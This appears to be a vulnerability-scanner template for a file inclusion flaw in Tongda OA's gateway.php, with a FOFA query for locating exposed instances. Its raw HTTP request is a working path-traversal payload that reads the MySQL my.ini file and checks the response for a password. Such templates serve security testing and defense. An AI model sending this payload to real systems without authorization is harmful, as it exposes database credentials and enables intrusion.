http:
    - matchers:
        - condition: and
          part: body
          regex:
            - mysql5
            - password
          type: regex
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /ispirit/interface/gateway.php?json={%22url%22:%22/general/../../mysql5/my.ini%22} HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Moziilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
          Connection: close
          Accept-Encoding: gzip
id: tongda-oa-gateway-php-fileinclude
info:
    author: pphua,nobody
    metadata:
        fofa-query: app="TDXK-通达OA"
        veified: true
    name: 通达OA gateway.php任意文件包含漏洞
    reference:
        - https://www.anquanke.com//post/id/210395
    severity: critical
    tags:
        - tongda
        - fileinclude
        - 通达oa
        - TDXK-通达OA
